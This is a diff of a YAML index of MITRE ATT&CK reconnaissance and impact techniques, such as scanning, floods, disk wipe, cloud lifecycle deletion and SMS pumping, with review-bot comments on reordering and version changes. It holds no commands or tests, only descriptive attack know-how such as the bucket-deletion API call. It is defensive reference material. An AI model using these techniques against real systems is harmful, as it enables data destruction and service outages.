Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -57099,19 +57764,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
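Review bot: T1595.001 gains the data source `'Network Traffic: Network Traffic Content'` alongside `Network Traffic Flow` and is bumped to version 1.1, but `x_mitre_detection` is unchanged and still only describes flow-level signals (large quantities from a single source). Any atomic test later attached to this entry will inherit that guidance, so it is worth stating in the PR that content-level detection is now in scope per upstream even though the detection text does not mention it.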
@@ -57169,7 +57856,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -57190,7 +57876,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -57206,8 +57892,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -57233,7 +57917,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -57249,8 +57933,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -57274,7 +57956,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -57296,13 +57978,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -57394,13 +58074,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -57409,7 +58088,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -57426,17 +58104,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
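Review bot: T1498.001 loses the `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` platforms (version 1.3 to 1.4) with nothing added in their place, leaving Windows, IaaS, Linux and macOS. If per-platform index files are generated from these platform lists, they must be regenerated in the same change or this technique will linger in the SaaS-type indexes. Also, `x_mitre_modified_by_ref` is removed here only to be re-added lower in the same object, which is more key-order churn.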
@@ -57461,7 +58134,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -57499,7 +58173,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57533,12 +58207,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57603,42 +58275,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
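Review bot: the `- created: '2020-02-20T15:35:00.025Z'`, `- external_id: T1499.003` and `- url: https://attack.mitre.org/techniques/T1499/003` lines removed in this hunk belong to T1499.003, not to the new T1496.003 object, and each is re-added unchanged under `attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9` in the following hunks, so no data is lost; but because the generator now emits keys in a different order, the hunk reads as if the new SMS Pumping object had absorbed T1499.003's `type`, `created_by_ref` and `external_references` context lines. Pinning the key order in the generator would make future regenerations reviewable as data changes rather than reorders. On the new object itself: the three `(Citation: ...)` keys used in the description (`Twilio SMS Pumping`, `Twilio SMS Pumping Fraud`, `AWS RE:Inforce Threat Detection 2024`) each resolve to a `source_name` in its `external_references`, and the empty `x_mitre_detection: ''` matches the other newly added T1496.* objects in this patch.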
@@ -57649,13 +58406,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
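Review bot: the `x_mitre_modified_by_ref` removed in this hunk is re-added at the end of the same T1499.003 object in the next hunk, so the field is only moved; the real change here is the version bump `'1.2'` to `'1.3'` paired with the newly listed `x_mitre_platforms` (Windows, IaaS, Linux, macOS), which is worth stating in the commit message since the rest of the object churn is reordering. The unchanged detection text still carries the upstream run-on "can identify a sudden surge in one type of protocol can be used to detect"; as this file is regenerated from upstream, that wording should be fixed in the ATT&CK source rather than edited here.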
@@ -57663,12 +58427,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
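Review bot: the T1561 `modified` timestamp moves backwards in this hunk (`'2023-05-09T14:00:00.188Z'` to `'2023-04-20T18:16:41.942Z'`), which a regenerated index should not normally do. The removed stamps across this patch all share the `14:00:00.188Z` shape (also `'2022-05-11T14:00:00.188Z'` a few lines above), which looks like a batch release stamp rather than an edit time, so the earlier replacement is plausible, but please confirm against the upstream bundle and mention it in the commit message so nobody reads the regression as a merge of stale data.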
@@ -57729,109 +58514,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
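Review bot: the one substantive data change in the T1565.001 block is the `FireEye APT38 Oct 2018` reference URL moving from `https://content.fireeye.com/apt/rpt-apt38` to the `https://www.mandiant.com/...rpt-apt38-2018-web_v5-1.pdf` PDF; everything else in that object is key reordering, so the URL change deserves a line in the commit message. In the T1489 description the only edit is moving the period before `(Citation: Novetta Blockbuster)`, but note the line break immediately after `MSExchangeIS` (and after `ChangeServiceConfigW` in the detection text below), which suggests inline markup was stripped from the stored string; verify the generated description still matches the upstream text.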
@@ -57840,10 +58595,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -57854,39 +58613,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
